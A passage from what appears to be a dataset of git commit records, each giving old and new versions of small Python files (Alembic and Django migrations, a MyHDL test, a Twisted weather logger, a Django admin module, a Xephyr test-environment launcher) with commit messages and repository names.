for token in msg.text.split():
if token.startswith("#"):
groups.append(token[1:])
if token.startswith("@"):
mentions.append(token[1:])
groups = [i.lower() for i in groups]
mentions = [i.lower() for i in mentions]
if 'chat' in groups or 'chat' in mentions:
# we got a match for chat send message to guys from
# sender's facility
self._send_chat_msg(msg)
return True
|
|
181c10f604cfc89181c548a3527b12ccdfbed596
|
migrations/versions/430_add_entries_to_lots_table_for_dos.py
|
migrations/versions/430_add_entries_to_lots_table_for_dos.py
|
"""add entries to lots table for DOS
Revision ID: 430
Revises: 420
Create Date: 2015-11-16 11:34:41.412730
"""
# revision identifiers, used by Alembic.
revision = '430'
down_revision = '420'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.sql import table, column
def upgrade():
# Insert DOS lot records
lot_table = table(
'lots',
column('name', sa.String),
column('slug', sa.String),
column('one_service_limit', sa.Boolean)
)
op.bulk_insert(lot_table, [
{'name': 'Digital outcomes', 'slug': 'digital-outcomes', 'one_service_limit': True},
{'name': 'Digital specialists', 'slug': 'digital-specialists', 'one_service_limit': True},
{'name': 'User research studios', 'slug': 'user-research-studios',
'one_service_limit': False},
{'name': 'User research participants', 'slug': 'user-research-participants',
'one_service_limit': True},
])
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
res = conn.execute("SELECT id FROM lots WHERE slug in ('digital-outcomes'," +
"'digital-specialists', 'user-research-studios'," +
" 'user-research-participants')")
lots = list(res.fetchall())
if len(framework) == 0:
raise Exception("Framework not found")
for lot in lots:
op.execute("INSERT INTO framework_lots (framework_id, lot_id) VALUES({}, {})".format(
framework[0]["id"], lot["id"]))
def downgrade():
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
op.execute("""
DELETE FROM framework_lots WHERE framework_id={}
""".format(framework[0]['id']))
op.execute("""
DELETE from lots WHERE slug in ('digital-outcomes', 'digital-specialists',
'user-research-studios', 'user-research-participants');
""")
|
Add data migration for dos entries in lots table
|
Add data migration for dos entries in lots table
|
Python
|
mit
|
alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api,alphagov/digitalmarketplace-api
|
Add data migration for dos entries in lots table
|
"""add entries to lots table for DOS
Revision ID: 430
Revises: 420
Create Date: 2015-11-16 11:34:41.412730
"""
# revision identifiers, used by Alembic.
revision = '430'
down_revision = '420'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.sql import table, column
def upgrade():
# Insert DOS lot records
lot_table = table(
'lots',
column('name', sa.String),
column('slug', sa.String),
column('one_service_limit', sa.Boolean)
)
op.bulk_insert(lot_table, [
{'name': 'Digital outcomes', 'slug': 'digital-outcomes', 'one_service_limit': True},
{'name': 'Digital specialists', 'slug': 'digital-specialists', 'one_service_limit': True},
{'name': 'User research studios', 'slug': 'user-research-studios',
'one_service_limit': False},
{'name': 'User research participants', 'slug': 'user-research-participants',
'one_service_limit': True},
])
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
res = conn.execute("SELECT id FROM lots WHERE slug in ('digital-outcomes'," +
"'digital-specialists', 'user-research-studios'," +
" 'user-research-participants')")
lots = list(res.fetchall())
if len(framework) == 0:
raise Exception("Framework not found")
for lot in lots:
op.execute("INSERT INTO framework_lots (framework_id, lot_id) VALUES({}, {})".format(
framework[0]["id"], lot["id"]))
def downgrade():
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
op.execute("""
DELETE FROM framework_lots WHERE framework_id={}
""".format(framework[0]['id']))
op.execute("""
DELETE from lots WHERE slug in ('digital-outcomes', 'digital-specialists',
'user-research-studios', 'user-research-participants');
""")
|
<commit_before><commit_msg>Add data migration for dos entries in lots table<commit_after>
|
"""add entries to lots table for DOS
Revision ID: 430
Revises: 420
Create Date: 2015-11-16 11:34:41.412730
"""
# revision identifiers, used by Alembic.
revision = '430'
down_revision = '420'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.sql import table, column
def upgrade():
# Insert DOS lot records
lot_table = table(
'lots',
column('name', sa.String),
column('slug', sa.String),
column('one_service_limit', sa.Boolean)
)
op.bulk_insert(lot_table, [
{'name': 'Digital outcomes', 'slug': 'digital-outcomes', 'one_service_limit': True},
{'name': 'Digital specialists', 'slug': 'digital-specialists', 'one_service_limit': True},
{'name': 'User research studios', 'slug': 'user-research-studios',
'one_service_limit': False},
{'name': 'User research participants', 'slug': 'user-research-participants',
'one_service_limit': True},
])
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
res = conn.execute("SELECT id FROM lots WHERE slug in ('digital-outcomes'," +
"'digital-specialists', 'user-research-studios'," +
" 'user-research-participants')")
lots = list(res.fetchall())
if len(framework) == 0:
raise Exception("Framework not found")
for lot in lots:
op.execute("INSERT INTO framework_lots (framework_id, lot_id) VALUES({}, {})".format(
framework[0]["id"], lot["id"]))
def downgrade():
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
op.execute("""
DELETE FROM framework_lots WHERE framework_id={}
""".format(framework[0]['id']))
op.execute("""
DELETE from lots WHERE slug in ('digital-outcomes', 'digital-specialists',
'user-research-studios', 'user-research-participants');
""")
|
Add data migration for dos entries in lots table"""add entries to lots table for DOS
Revision ID: 430
Revises: 420
Create Date: 2015-11-16 11:34:41.412730
"""
# revision identifiers, used by Alembic.
revision = '430'
down_revision = '420'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.sql import table, column
def upgrade():
# Insert DOS lot records
lot_table = table(
'lots',
column('name', sa.String),
column('slug', sa.String),
column('one_service_limit', sa.Boolean)
)
op.bulk_insert(lot_table, [
{'name': 'Digital outcomes', 'slug': 'digital-outcomes', 'one_service_limit': True},
{'name': 'Digital specialists', 'slug': 'digital-specialists', 'one_service_limit': True},
{'name': 'User research studios', 'slug': 'user-research-studios',
'one_service_limit': False},
{'name': 'User research participants', 'slug': 'user-research-participants',
'one_service_limit': True},
])
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
res = conn.execute("SELECT id FROM lots WHERE slug in ('digital-outcomes'," +
"'digital-specialists', 'user-research-studios'," +
" 'user-research-participants')")
lots = list(res.fetchall())
if len(framework) == 0:
raise Exception("Framework not found")
for lot in lots:
op.execute("INSERT INTO framework_lots (framework_id, lot_id) VALUES({}, {})".format(
framework[0]["id"], lot["id"]))
def downgrade():
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
op.execute("""
DELETE FROM framework_lots WHERE framework_id={}
""".format(framework[0]['id']))
op.execute("""
DELETE from lots WHERE slug in ('digital-outcomes', 'digital-specialists',
'user-research-studios', 'user-research-participants');
""")
|
<commit_before><commit_msg>Add data migration for dos entries in lots table<commit_after>"""add entries to lots table for DOS
Revision ID: 430
Revises: 420
Create Date: 2015-11-16 11:34:41.412730
"""
# revision identifiers, used by Alembic.
revision = '430'
down_revision = '420'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.sql import table, column
def upgrade():
# Insert DOS lot records
lot_table = table(
'lots',
column('name', sa.String),
column('slug', sa.String),
column('one_service_limit', sa.Boolean)
)
op.bulk_insert(lot_table, [
{'name': 'Digital outcomes', 'slug': 'digital-outcomes', 'one_service_limit': True},
{'name': 'Digital specialists', 'slug': 'digital-specialists', 'one_service_limit': True},
{'name': 'User research studios', 'slug': 'user-research-studios',
'one_service_limit': False},
{'name': 'User research participants', 'slug': 'user-research-participants',
'one_service_limit': True},
])
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
res = conn.execute("SELECT id FROM lots WHERE slug in ('digital-outcomes'," +
"'digital-specialists', 'user-research-studios'," +
" 'user-research-participants')")
lots = list(res.fetchall())
if len(framework) == 0:
raise Exception("Framework not found")
for lot in lots:
op.execute("INSERT INTO framework_lots (framework_id, lot_id) VALUES({}, {})".format(
framework[0]["id"], lot["id"]))
def downgrade():
conn = op.get_bind()
res = conn.execute("SELECT id FROM frameworks WHERE slug = 'digital-outcomes-and-specialists'")
framework = list(res.fetchall())
op.execute("""
DELETE FROM framework_lots WHERE framework_id={}
""".format(framework[0]['id']))
op.execute("""
DELETE from lots WHERE slug in ('digital-outcomes', 'digital-specialists',
'user-research-studios', 'user-research-participants');
""")
|
|
fb7e60951fc790398ce10dcbaf2f5bcd6151520d
|
osf/migrations/0148_merge_20181213_2253.py
|
osf/migrations/0148_merge_20181213_2253.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 22:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0147_blacklistedemaildomain'),
('osf', '0147_repoint_preprint_pagecounters'),
]
operations = [
]
|
Add final divorce merge migration
|
Add final divorce merge migration
|
Python
|
apache-2.0
|
mfraezz/osf.io,adlius/osf.io,pattisdr/osf.io,mfraezz/osf.io,felliott/osf.io,brianjgeiger/osf.io,Johnetordoff/osf.io,pattisdr/osf.io,felliott/osf.io,CenterForOpenScience/osf.io,pattisdr/osf.io,aaxelb/osf.io,saradbowman/osf.io,mattclark/osf.io,brianjgeiger/osf.io,Johnetordoff/osf.io,brianjgeiger/osf.io,CenterForOpenScience/osf.io,baylee-d/osf.io,Johnetordoff/osf.io,felliott/osf.io,cslzchen/osf.io,cslzchen/osf.io,cslzchen/osf.io,cslzchen/osf.io,felliott/osf.io,mfraezz/osf.io,aaxelb/osf.io,Johnetordoff/osf.io,brianjgeiger/osf.io,adlius/osf.io,aaxelb/osf.io,saradbowman/osf.io,mfraezz/osf.io,adlius/osf.io,CenterForOpenScience/osf.io,aaxelb/osf.io,mattclark/osf.io,baylee-d/osf.io,CenterForOpenScience/osf.io,baylee-d/osf.io,mattclark/osf.io,adlius/osf.io
|
Add final divorce merge migration
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 22:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0147_blacklistedemaildomain'),
('osf', '0147_repoint_preprint_pagecounters'),
]
operations = [
]
|
<commit_before><commit_msg>Add final divorce merge migration<commit_after>
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 22:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0147_blacklistedemaildomain'),
('osf', '0147_repoint_preprint_pagecounters'),
]
operations = [
]
|
Add final divorce merge migration# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 22:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0147_blacklistedemaildomain'),
('osf', '0147_repoint_preprint_pagecounters'),
]
operations = [
]
|
<commit_before><commit_msg>Add final divorce merge migration<commit_after># -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-12-13 22:53
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('osf', '0147_blacklistedemaildomain'),
('osf', '0147_repoint_preprint_pagecounters'),
]
operations = [
]
|
|
f61440f8b51e8d1e30a94d71eb1fac42ee4818b9
|
myhdl/test/conversion/toVHDL/test_delay.py
|
myhdl/test/conversion/toVHDL/test_delay.py
|
from __future__ import absolute_import
from myhdl import *
def bench_delay():
clock = Signal(False)
HALF_PERIOD = 10
@instance
def clockgen():
clock.next = False
while True:
yield delay(HALF_PERIOD)
clock.next = not clock
@instance
def stimulus():
for i in range(16):
yield clock.posedge
print(now())
raise StopSimulation
return instances()
def test_delay():
assert conversion.verify(bench_delay) == 0
|
Solve a problem with time constants
|
Solve a problem with time constants
|
Python
|
lgpl-2.1
|
jmgc/myhdl-numeric,jmgc/myhdl-numeric,jmgc/myhdl-numeric
|
Solve a problem with time constants
|
from __future__ import absolute_import
from myhdl import *
def bench_delay():
clock = Signal(False)
HALF_PERIOD = 10
@instance
def clockgen():
clock.next = False
while True:
yield delay(HALF_PERIOD)
clock.next = not clock
@instance
def stimulus():
for i in range(16):
yield clock.posedge
print(now())
raise StopSimulation
return instances()
def test_delay():
assert conversion.verify(bench_delay) == 0
|
<commit_before><commit_msg>Solve a problem with time constants<commit_after>
|
from __future__ import absolute_import
from myhdl import *
def bench_delay():
clock = Signal(False)
HALF_PERIOD = 10
@instance
def clockgen():
clock.next = False
while True:
yield delay(HALF_PERIOD)
clock.next = not clock
@instance
def stimulus():
for i in range(16):
yield clock.posedge
print(now())
raise StopSimulation
return instances()
def test_delay():
assert conversion.verify(bench_delay) == 0
|
Solve a problem with time constantsfrom __future__ import absolute_import
from myhdl import *
def bench_delay():
clock = Signal(False)
HALF_PERIOD = 10
@instance
def clockgen():
clock.next = False
while True:
yield delay(HALF_PERIOD)
clock.next = not clock
@instance
def stimulus():
for i in range(16):
yield clock.posedge
print(now())
raise StopSimulation
return instances()
def test_delay():
assert conversion.verify(bench_delay) == 0
|
<commit_before><commit_msg>Solve a problem with time constants<commit_after>from __future__ import absolute_import
from myhdl import *
def bench_delay():
clock = Signal(False)
HALF_PERIOD = 10
@instance
def clockgen():
clock.next = False
while True:
yield delay(HALF_PERIOD)
clock.next = not clock
@instance
def stimulus():
for i in range(16):
yield clock.posedge
print(now())
raise StopSimulation
return instances()
def test_delay():
assert conversion.verify(bench_delay) == 0
|
|
6cba5b2507afa123a79a3def08a92568952c6937
|
weatherlogger.py
|
weatherlogger.py
|
from twisted.internet import task, reactor, defer, protocol
from twisted.web.client import Agent
class ResponseReader(protocol.Protocol):
def __init__(self, finished):
self.finished = finished
self.buffer = ''
def dataReceived(self, data):
self.buffer += data
def connectionLost(self, reason):
self.finished.callback(self.buffer)
class WeatherLogger():
def __init__(self, settings):
self.settings = settings
interval = self.settings['weather']['interval']
self.apikey = self.settings['weather']['apikey']
self.latitude = self.settings['weather']['latitude']
self.longitude = self.settings['weather']['longitude']
self.agent = Agent(reactor)
self.monitortask = task.LoopingCall(self.UpdateWeather)
self.monitortask.start(interval)
def UpdateWeather(self):
url = 'https://api.forecast.io/forecast/{0}/{2},{1}?exclude=minutely,hourly,daily'.format(self.apikey, self.latitude, self.longitude)
print "Updating Weather from", url
d = self.agent.request('GET',url)
d.addCallback(self.GotResponse)
def GotResponse(self, response):
if response.code == 200:
d = defer.Deferred()
response.deliverBody(ResponseReader(d))
d.addCallback(self.ProcessBody)
return d
def ProcessBody(self, body):
print body
if __name__=="__main__":
from configuration import Configuration
conf = Configuration()
logger = WeatherLogger(conf.settings)
reactor.run()
|
Implement basic weather API call
|
Implement basic weather API call
|
Python
|
mit
|
msieker/pimonitor,johan--/pimonitor
|
Implement basic weather API call
|
from twisted.internet import task, reactor, defer, protocol
from twisted.web.client import Agent
class ResponseReader(protocol.Protocol):
def __init__(self, finished):
self.finished = finished
self.buffer = ''
def dataReceived(self, data):
self.buffer += data
def connectionLost(self, reason):
self.finished.callback(self.buffer)
class WeatherLogger():
def __init__(self, settings):
self.settings = settings
interval = self.settings['weather']['interval']
self.apikey = self.settings['weather']['apikey']
self.latitude = self.settings['weather']['latitude']
self.longitude = self.settings['weather']['longitude']
self.agent = Agent(reactor)
self.monitortask = task.LoopingCall(self.UpdateWeather)
self.monitortask.start(interval)
def UpdateWeather(self):
url = 'https://api.forecast.io/forecast/{0}/{2},{1}?exclude=minutely,hourly,daily'.format(self.apikey, self.latitude, self.longitude)
print "Updating Weather from", url
d = self.agent.request('GET',url)
d.addCallback(self.GotResponse)
def GotResponse(self, response):
if response.code == 200:
d = defer.Deferred()
response.deliverBody(ResponseReader(d))
d.addCallback(self.ProcessBody)
return d
def ProcessBody(self, body):
print body
if __name__=="__main__":
from configuration import Configuration
conf = Configuration()
logger = WeatherLogger(conf.settings)
reactor.run()
|
<commit_before><commit_msg>Implement basic weather API call<commit_after>
|
from twisted.internet import task, reactor, defer, protocol
from twisted.web.client import Agent
class ResponseReader(protocol.Protocol):
def __init__(self, finished):
self.finished = finished
self.buffer = ''
def dataReceived(self, data):
self.buffer += data
def connectionLost(self, reason):
self.finished.callback(self.buffer)
class WeatherLogger():
def __init__(self, settings):
self.settings = settings
interval = self.settings['weather']['interval']
self.apikey = self.settings['weather']['apikey']
self.latitude = self.settings['weather']['latitude']
self.longitude = self.settings['weather']['longitude']
self.agent = Agent(reactor)
self.monitortask = task.LoopingCall(self.UpdateWeather)
self.monitortask.start(interval)
def UpdateWeather(self):
url = 'https://api.forecast.io/forecast/{0}/{2},{1}?exclude=minutely,hourly,daily'.format(self.apikey, self.latitude, self.longitude)
print "Updating Weather from", url
d = self.agent.request('GET',url)
d.addCallback(self.GotResponse)
def GotResponse(self, response):
if response.code == 200:
d = defer.Deferred()
response.deliverBody(ResponseReader(d))
d.addCallback(self.ProcessBody)
return d
def ProcessBody(self, body):
print body
if __name__=="__main__":
from configuration import Configuration
conf = Configuration()
logger = WeatherLogger(conf.settings)
reactor.run()
|
Implement basic weather API callfrom twisted.internet import task, reactor, defer, protocol
from twisted.web.client import Agent
class ResponseReader(protocol.Protocol):
def __init__(self, finished):
self.finished = finished
self.buffer = ''
def dataReceived(self, data):
self.buffer += data
def connectionLost(self, reason):
self.finished.callback(self.buffer)
class WeatherLogger():
def __init__(self, settings):
self.settings = settings
interval = self.settings['weather']['interval']
self.apikey = self.settings['weather']['apikey']
self.latitude = self.settings['weather']['latitude']
self.longitude = self.settings['weather']['longitude']
self.agent = Agent(reactor)
self.monitortask = task.LoopingCall(self.UpdateWeather)
self.monitortask.start(interval)
def UpdateWeather(self):
url = 'https://api.forecast.io/forecast/{0}/{2},{1}?exclude=minutely,hourly,daily'.format(self.apikey, self.latitude, self.longitude)
print "Updating Weather from", url
d = self.agent.request('GET',url)
d.addCallback(self.GotResponse)
def GotResponse(self, response):
if response.code == 200:
d = defer.Deferred()
response.deliverBody(ResponseReader(d))
d.addCallback(self.ProcessBody)
return d
def ProcessBody(self, body):
print body
if __name__=="__main__":
from configuration import Configuration
conf = Configuration()
logger = WeatherLogger(conf.settings)
reactor.run()
|
<commit_before><commit_msg>Implement basic weather API call<commit_after>from twisted.internet import task, reactor, defer, protocol
from twisted.web.client import Agent
class ResponseReader(protocol.Protocol):
def __init__(self, finished):
self.finished = finished
self.buffer = ''
def dataReceived(self, data):
self.buffer += data
def connectionLost(self, reason):
self.finished.callback(self.buffer)
class WeatherLogger():
def __init__(self, settings):
self.settings = settings
interval = self.settings['weather']['interval']
self.apikey = self.settings['weather']['apikey']
self.latitude = self.settings['weather']['latitude']
self.longitude = self.settings['weather']['longitude']
self.agent = Agent(reactor)
self.monitortask = task.LoopingCall(self.UpdateWeather)
self.monitortask.start(interval)
def UpdateWeather(self):
url = 'https://api.forecast.io/forecast/{0}/{2},{1}?exclude=minutely,hourly,daily'.format(self.apikey, self.latitude, self.longitude)
print "Updating Weather from", url
d = self.agent.request('GET',url)
d.addCallback(self.GotResponse)
def GotResponse(self, response):
if response.code == 200:
d = defer.Deferred()
response.deliverBody(ResponseReader(d))
d.addCallback(self.ProcessBody)
return d
def ProcessBody(self, body):
print body
if __name__=="__main__":
from configuration import Configuration
conf = Configuration()
logger = WeatherLogger(conf.settings)
reactor.run()
|
|
3a06f01a9440b05b87bebc33d1342cd71fbeefbb
|
samples/admin.py
|
samples/admin.py
|
from django.contrib import admin
from .models import Patient, PatientRegister, FluVaccine, Sample, CollectionType
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
]
admin.site.register(Patient)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(PatientRegister, PatientRegisterAdmin)
|
from django.contrib import admin
from .models import (
Patient, PatientRegister,
FluVaccine,
Sample, CollectionType,
Symptom, ObservedSymptom
)
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class ObservedSymptomInline(admin.StackedInline):
model = ObservedSymptom
extra = 2
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
ObservedSymptomInline,
]
admin.site.register(Patient)
admin.site.register(PatientRegister, PatientRegisterAdmin)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(Symptom)
|
Add Symptoms and ObservedSymptoms to Admin
|
:rocket: Add Symptoms and ObservedSymptoms to Admin
|
Python
|
mit
|
gems-uff/labsys,gems-uff/labsys,gcrsaldanha/fiocruz,gcrsaldanha/fiocruz,gems-uff/labsys
|
from django.contrib import admin
from .models import Patient, PatientRegister, FluVaccine, Sample, CollectionType
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
]
admin.site.register(Patient)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(PatientRegister, PatientRegisterAdmin)
:rocket: Add Symptoms and ObservedSymptoms to Admin
|
from django.contrib import admin
from .models import (
Patient, PatientRegister,
FluVaccine,
Sample, CollectionType,
Symptom, ObservedSymptom
)
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class ObservedSymptomInline(admin.StackedInline):
model = ObservedSymptom
extra = 2
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
ObservedSymptomInline,
]
admin.site.register(Patient)
admin.site.register(PatientRegister, PatientRegisterAdmin)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(Symptom)
|
<commit_before>from django.contrib import admin
from .models import Patient, PatientRegister, FluVaccine, Sample, CollectionType
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
]
admin.site.register(Patient)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(PatientRegister, PatientRegisterAdmin)
<commit_msg>:rocket: Add Symptoms and ObservedSymptoms to Admin<commit_after>
|
from django.contrib import admin
from .models import (
Patient, PatientRegister,
FluVaccine,
Sample, CollectionType,
Symptom, ObservedSymptom
)
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class ObservedSymptomInline(admin.StackedInline):
model = ObservedSymptom
extra = 2
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
ObservedSymptomInline,
]
admin.site.register(Patient)
admin.site.register(PatientRegister, PatientRegisterAdmin)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(Symptom)
|
from django.contrib import admin
from .models import Patient, PatientRegister, FluVaccine, Sample, CollectionType
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
]
admin.site.register(Patient)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(PatientRegister, PatientRegisterAdmin)
:rocket: Add Symptoms and ObservedSymptoms to Adminfrom django.contrib import admin
from .models import (
Patient, PatientRegister,
FluVaccine,
Sample, CollectionType,
Symptom, ObservedSymptom
)
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class ObservedSymptomInline(admin.StackedInline):
model = ObservedSymptom
extra = 2
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
ObservedSymptomInline,
]
admin.site.register(Patient)
admin.site.register(PatientRegister, PatientRegisterAdmin)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(Symptom)
|
<commit_before>from django.contrib import admin
from .models import Patient, PatientRegister, FluVaccine, Sample, CollectionType
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
]
admin.site.register(Patient)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(PatientRegister, PatientRegisterAdmin)
<commit_msg>:rocket: Add Symptoms and ObservedSymptoms to Admin<commit_after>from django.contrib import admin
from .models import (
Patient, PatientRegister,
FluVaccine,
Sample, CollectionType,
Symptom, ObservedSymptom
)
class FluVaccineInline(admin.StackedInline):
model = FluVaccine
extra = 1
class SampleInline(admin.StackedInline):
model = Sample
extra = 1
class ObservedSymptomInline(admin.StackedInline):
model = ObservedSymptom
extra = 2
class PatientRegisterAdmin(admin.ModelAdmin):
fieldsets = [
('Informações do Paciente', {'fields': ['patient']}),
('Dados institucionais', {'fields': ['id_gal_origin']}),
]
inlines = [
SampleInline,
FluVaccineInline,
ObservedSymptomInline,
]
admin.site.register(Patient)
admin.site.register(PatientRegister, PatientRegisterAdmin)
admin.site.register(Sample)
admin.site.register(CollectionType)
admin.site.register(Symptom)
|
9df2cddf573ad574a98b57164f0c186cf86dfcc4
|
spawn-test-env.py
|
spawn-test-env.py
|
#!/usr/bin/python -t
import sys, os
import gtk, gobject
import pwd
import types
def change_user(user):
try:
pwrec = pwd.getpwnam(user)
except KeyError:
raise Exception("Username '%s' does not exist." % user)
uid = pwrec[2]
os.setuid(uid)
return pwrec[6]
def shell_watch_cb(pid, condition, user_data=None):
print "In shell watch callback."
gtk.main_quit()
def main():
if len(sys.argv) < 1:
print "Usage: %s <test user>" % sys.argv[0]
user = sys.argv[1]
# Start Xephyr
DISPLAY = ":10"
args = "/usr/bin/Xephyr -ac -host-cursor -screen 800x600 %s" % DISPLAY
args = args.split()
(xephyr_pid, ign1, ign2, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "Xepyhr pid is %d" % xephyr_pid
shell = change_user(user)
args = "/bin/dbus-daemon --session --print-address".split()
(dbus_pid, ign1, dbus_stdout, ign3) = gobject.spawn_async(args, flags=gobject.SPAWN_STDERR_TO_DEV_NULL, standard_output=True)
dbus_file = os.fdopen(dbus_stdout)
addr = dbus_file.readline()
addr = addr.strip()
print "dbus-daemon pid is %d, session bus address is %s" % (dbus_pid, addr)
dbus_file.close()
os.environ["DISPLAY"] = DISPLAY
os.environ["DBUS_SESSION_BUS_ADDRESS"] = addr
args = "/usr/bin/metacity"
(metacity_pid, ign1, ign2, ign3) = gobject.spawn_async([args], flags=gobject.SPAWN_STDERR_TO_DEV_NULL | gobject.SPAWN_STDOUT_TO_DEV_NULL)
print "\n"
(shell_pid, ign1, ign2, ign3) = gobject.spawn_async([shell], flags=gobject.SPAWN_LEAVE_DESCRIPTORS_OPEN | gobject.SPAWN_CHILD_INHERITS_STDIN | gobject.SPAWN_DO_NOT_REAP_CHILD)
gobject.child_watch_add(shell_pid, shell_watch_cb)
try:
gtk.main()
except KeyboardInterrupt:
pass
try:
os.kill(dbus_pid, 9)
except OSError:
pass
try:
os.kill(metacity_pid, 9)
except OSError:
pass
if __name__ == "__main__":
main()
|
Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell
|
Add script that starts Xephyr, dbus, and metacity for a test user then dumps you to a shell
|
Python
|
lgpl-2.1
|
